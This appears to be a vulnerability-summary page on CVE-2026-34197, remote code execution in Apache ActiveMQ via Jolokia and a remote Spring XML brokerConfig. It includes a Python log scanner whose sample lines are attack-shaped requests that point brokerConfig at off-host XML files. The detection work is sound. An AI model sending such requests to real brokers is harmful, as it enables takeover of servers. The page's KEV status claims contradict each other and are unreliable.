Critical remote code execution vulnerability in Apache ActiveMQ through the Jolokia JMX-HTTP bridge exposed on the web console. Authenticated attackers can exploit crafted discovery URIs to trigger remote Spring XML loading, leading to arbitrary code execution via bean factory methods.
Data Source: CIRCL
Confidence: HIGH
Exploitation Method: DIRECT_NETWORK
CVE Published: 2026-04-07
Added to CISA KEV: 2026-04-16 (9 days between CVE publication and KEV listing)
The vulnerability scores 8.8 on CVSS, indicating high severity. The EPSS score is below 1%, suggesting a low probability of exploitation in the wild, and it is not listed in the CISA KEV catalog. Nevertheless, because it enables remote code execution once an attacker has broker credentials, the risk remains significant. Exploitation requires network access to the broker, valid authentication ...
CVE-2026-34197 Detail: An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
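A detection helper for the mechanism described above, added here as an example and not taken from the page or from the ActiveMQ project. It scans web-console request logs for Jolokia calls whose argument carries a VM-transport URI with a brokerConfig parameter that points at a remote resource, which is the condition under which the broker would fetch a Spring XML context off-host. The log format (an access log extended with the request body), the /api/jolokia path, the MBean name, the "exampleOperation" placeholder and the handling of an xbean: prefix are all assumptions; the sample lines are constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed default path of the Jolokia endpoint in the ActiveMQ web console.
JOLOKIA_PATH = re.compile(r"\b(?:GET|POST)\s+/api/jolokia\b", re.I)
# A VM-transport URI as it appears in a request path or a JSON body (stops at quotes/whitespace).
VM_URI = re.compile(r"vm:(?://)?[^\s\"'\\]+", re.I)
# Schemes that would make the broker load its Spring XML from another host.
REMOTE_SCHEMES = ("http://", "https://")


def remote_broker_config(vm_uri: str) -> Optional[str]:
    """Return the brokerConfig value of a vm: URI if it points off-host, else None.
    An 'xbean:' prefix (ActiveMQ's config resource prefix, assumed here) is stripped
    before the scheme check so 'xbean:http://...' is still flagged."""
    query = urlsplit(vm_uri).query
    for value in parse_qs(query).get("brokerConfig", []):
        target = value[len("xbean:"):] if value.lower().startswith("xbean:") else value
        if target.lower().startswith(REMOTE_SCHEMES):
            return value
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, vm_uri, brokerConfig) for Jolokia requests whose
    argument would load a remote broker configuration. The line is examined
    raw, URL-decoded once and decoded twice, so a percent-encoded GET path is
    caught as well as a plain JSON body."""
    findings = []
    for number, line in enumerate(lines, 1):
        if not JOLOKIA_PATH.search(line):
            continue
        seen = set()
        for blob in (line, unquote(line), unquote(unquote(line))):
            for match in VM_URI.finditer(blob):
                uri = match.group(0)
                if uri in seen:
                    continue
                seen.add(uri)
                cfg = remote_broker_config(uri)
                if cfg:
                    findings.append((number, uri, cfg))
    return findings


# Constructed sample log: access-log fields followed by a body=... field.
SAMPLE_LOG = [
    '198.51.100.20 - admin [16/Apr/2026:10:01:05 +0000] "GET /api/jolokia/version HTTP/1.1" 200 412 body=-',
    '198.51.100.20 - admin [16/Apr/2026:10:01:12 +0000] "POST /api/jolokia/ HTTP/1.1" 200 310 '
    'body={"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"exampleOperation","arguments":["vm://localhost?brokerConfig=http://198.51.100.7/ctx.xml"]}',
    '198.51.100.20 - admin [16/Apr/2026:10:02:40 +0000] "GET /api/jolokia/exec/'
    'org.apache.activemq:type=Broker,brokerName=localhost/exampleOperation/'
    'vm%3A%2F%2Flocalhost%3FbrokerConfig%3Dhttps%3A%2F%2F203.0.113.5%2Fa.xml HTTP/1.1" 200 298 body=-',
    '198.51.100.20 - admin [16/Apr/2026:10:03:01 +0000] "POST /api/jolokia/ HTTP/1.1" 200 305 '
    'body={"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"exampleOperation","arguments":["vm://localhost?brokerConfig=xbean:activemq.xml"]}',
    '198.51.100.21 - - [16/Apr/2026:10:04:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 5120 body=-',
]

if __name__ == "__main__":
    for number, uri, cfg in scan_log(SAMPLE_LOG):
        print(f"line {number}: remote brokerConfig {cfg!r} in {uri}")
```

Lines 2 and 3 are reported; line 4 is not, because its brokerConfig names a local resource. Standard access logs do not record POST bodies, so this only sees the JSON form of the call if the proxy or console in front of the broker logs bodies; the percent-encoded GET form is visible in an ordinary access log.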
Attackers could execute unauthorized operating system commands, which could then be used to disable the product, or read and modify data for ...
CVE-2026-34197 is an ActiveMQ RCE flaw exploiting Jolokia to execute remote commands. Learn how it works, affected versions, and detection steps.
CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.